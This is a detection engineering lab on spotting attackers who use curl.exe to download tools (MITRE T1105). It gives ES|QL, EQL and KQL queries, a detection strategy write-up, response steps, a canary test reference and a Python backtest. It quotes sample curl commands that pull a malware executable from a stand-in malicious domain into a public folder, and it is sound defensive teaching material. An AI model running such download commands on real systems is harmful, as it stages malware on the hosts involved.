
Lab 5.1 (Bonus): Detection Engineering Capstone

Est. Time: 60 minutes

Goals:

  • Create a detection from the ground up, in any language of your choice, for the MITRE technique, T1105

Instructions

  1. This lab serves as a sort of “capstone” on the detection engineering front. Your objective is to, based on the MITRE TTP below, create the following for your new detection:
    1. Query
    2. Documentation (with analysis of backtest results)
    3. Canary code to trigger the detection
  2. The technique you will be making your detection for is:
    1. Ingress Tool Transfer
  3. This can be done a number of ways. T1105 covers a number of tools, techniques, and procedures, so scoping your detection to just a few is acceptable, as is focusing on broad techniques. Below are the queries I used, focusing primarily on curl. I also included an example ADS document and some canary code to trigger the detection.
  4. Solution

    These solutions serve as examples only!

    Alert Documentation:

    • ADS Document (leaning on the custom GPT we used)

      Ingress Tool Transfer: Curl

      Goal

      Detect instances where adversaries use curl.exe to transfer files from remote sources, which is commonly associated with MITRE ATT&CK Technique T1105 (Ingress Tool Transfer). Attackers often use curl.exe to download payloads, additional malware, or tools for further exploitation.

      Categorization

      • MITRE ATT&CK Parent Technique: TA0011 - Command and Control
      • MITRE ATT&CK Sub-Technique: T1105 - Ingress Tool Transfer

      Strategy Abstract

      This detection monitors instances where the Windows curl utility (curl.exe) is executed in association with a file creation event. Attackers use curl.exe to download files from external URLs, which could indicate an attempt to transfer malicious payloads.

      Technical Context

      ES|QL:

      FROM logs-*
      | WHERE process.name == "curl.exe" and event.code == "11"
      | KEEP process.name,process.command_line,file.name,event.action
      

      EQL:

      sequence with maxspan=10s
          [ process where process.name: "curl.exe"]
          [ network where true ]
          [ file where true ]
      

      KQL:

      process.name: "curl.exe" and event.code: 11
      

      Expected Log Sources

      • Windows Sysmon

      Example of Suspicious curl.exe Usage

      curl.exe -o C:\Users\Public\malware.exe http://malicious-domain.com/malware.exe
      

      Blind Spots and Assumptions

      • This detection assumes command-line logging is enabled (e.g., Sysmon, PowerShell logging).
      • Attackers may use obfuscation techniques, such as:
        • Renaming curl.exe
        • Using alternate file transfer tools (certutil, bitsadmin, PowerShell Invoke-WebRequest).

      False Positives

      • Legitimate file downloads: Developers or IT administrators may use curl.exe to fetch files.
      • Automated scripts: Some software installations or update processes use curl.exe.
      • Security tool updates: Endpoint security tools may fetch definitions via curl.exe.

      Reducing False Positives

      To reduce false positives, consider:

      • Filtering trusted domains: Exclude internal or trusted file transfer sources.
      • Monitoring process parent-child relationships: If curl.exe is launched by a suspicious parent (e.g., cmd.exe from a suspicious path), it might indicate malicious activity.
      • Filtering based on command-line arguments: Focus on file downloads from external, non-corporate domains.

      Validation

      Canary Code

      An Atomic Red Team canary already exists for this activity:

      Invoke-AtomicTest T1105-18
      

      Priority

      Medium

      • curl.exe is not frequently used by normal users, and its presence in logs with external URLs should be investigated.

      Response

      Incident Response Actions

      1. Confirm the command-line parameters
        • Extract the URL or file being downloaded.
        • Identify the parent process (e.g., cmd.exe, powershell.exe).
        • Check the execution context (user account, remote IP, etc.).
      2. Isolate the affected host
        • If the URL is malicious, isolate the host to prevent further execution.
      3. Retrieve the downloaded file
        • If possible, retrieve and analyze the file with static and dynamic analysis.
      4. Check for additional artifacts
        • Review logs for related activities (e.g., execution of the downloaded file).
        • Investigate for persistence mechanisms or lateral movement.
      5. Block the malicious domain
        • Add the domain to the firewall, proxy, or DNS blocklist.

      Additional Resources

    Basic ES|QL query looking for file creation events from curl.exe:

    FROM logs-*
    | WHERE process.name == "curl.exe" and event.code == "11"
    | KEEP process.name,process.command_line,file.name,event.action
    

    KQL, looking for file creation events by curl.exe:

    process.name: "curl.exe" and event.code: 11
    

    EQL, looking for curl.exe followed by a network connection and a file creation within 10 seconds:

    sequence with maxspan=10s
        [ process where process.name: "curl.exe"]
        [ network where true ]
        [ file where true ]
    
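A backtest of the EQL sequence above combined with the false-positive filters from the ADS document (trusted sources, parent process), written as an added Python example that is not the lab's own code. It replays the sequence over constructed Sysmon-style events; the trusted-host allow-list, the join on process.entity_id and all hostnames and paths are assumptions.

```python
from datetime import datetime, timedelta
from urllib.parse import urlparse
TRUSTED_HOSTS = {"artifacts.corp.example"}  # assumed allow-list of internal download sources
MAXSPAN = timedelta(seconds=10)             # same window as the page's EQL sequence

def ev(ts, code, pid, extra=None):
    # Minimal ECS-style Sysmon event for curl.exe (constructed sample data, not real telemetry)
    return {"@timestamp": ts, "event.code": code, "process.name": "curl.exe",
            "process.entity_id": pid, **(extra or {})}

EVENTS = [  # Sysmon event.code 1 = process create, 3 = network connect, 11 = file create
    # p1: download into a world-writable folder, launched from cmd.exe
    ev("2024-05-01T10:00:00Z", "1", "p1", {"process.parent.name": "cmd.exe",
       "process.command_line": "curl.exe -o C:\\Users\\Public\\payload.exe http://malicious-domain.example/payload.exe"}),
    ev("2024-05-01T10:00:01Z", "3", "p1"),
    ev("2024-05-01T10:00:02Z", "11", "p1", {"file.name": "payload.exe"}),
    # p2: build agent fetching from a trusted internal artifact server (expected false positive)
    ev("2024-05-01T10:05:00Z", "1", "p2", {"process.parent.name": "agent.exe",
       "process.command_line": "curl.exe -o C:\\build\\tool.zip https://artifacts.corp.example/tool.zip"}),
    ev("2024-05-01T10:05:01Z", "3", "p2"),
    ev("2024-05-01T10:05:02Z", "11", "p2", {"file.name": "tool.zip"}),
    # p3: the file write lands 30s after process start, outside the 10s maxspan
    ev("2024-05-01T10:10:00Z", "1", "p3", {"process.parent.name": "explorer.exe",
       "process.command_line": "curl.exe -O http://files.example/x.bin"}),
    ev("2024-05-01T10:10:01Z", "3", "p3"),
    ev("2024-05-01T10:10:30Z", "11", "p3", {"file.name": "x.bin"}),
]

def download_host(cmdline):
    """Host of the first http(s) URL on a curl command line, or None."""
    for tok in cmdline.split():
        if tok.startswith(("http://", "https://")):
            return urlparse(tok).hostname
    return None

def detect_curl_transfers(events, trusted=TRUSTED_HOSTS, maxspan=MAXSPAN):
    """Replay the EQL sequence: curl.exe process -> network -> file within maxspan. Joining on
    process.entity_id is an added assumption (the page's sequence has no 'by' clause)."""
    ts = lambda e: datetime.strptime(e["@timestamp"], "%Y-%m-%dT%H:%M:%SZ")
    chains = {}  # entity_id -> {event.code: first event seen with that code}
    for e in sorted(events, key=lambda e: e["@timestamp"]):
        if e.get("process.name") == "curl.exe":
            chains.setdefault(e["process.entity_id"], {}).setdefault(e["event.code"], e)
    hits = []
    for pid, c in chains.items():
        if not all(k in c for k in ("1", "3", "11")): continue
        t1, t3, t11 = ts(c["1"]), ts(c["3"]), ts(c["11"])
        host = download_host(c["1"]["process.command_line"])
        if t1 <= t3 <= t11 and t11 - t1 <= maxspan and host not in trusted:
            hits.append({"entity_id": pid, "host": host, "file": c["11"].get("file.name"),
                         "parent": c["1"].get("process.parent.name")})
    return hits
```

Running it over the sample set yields only p1; p2 is suppressed by the allow-list and p3 falls outside the sequence window, which is the kind of result a backtest section in the documentation should record.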

    In terms of canaries, an Atomic already exists that would apply to this circumstance! No need to re-invent the wheel:

    Atomic

    Invoke-AtomicTest T1105-18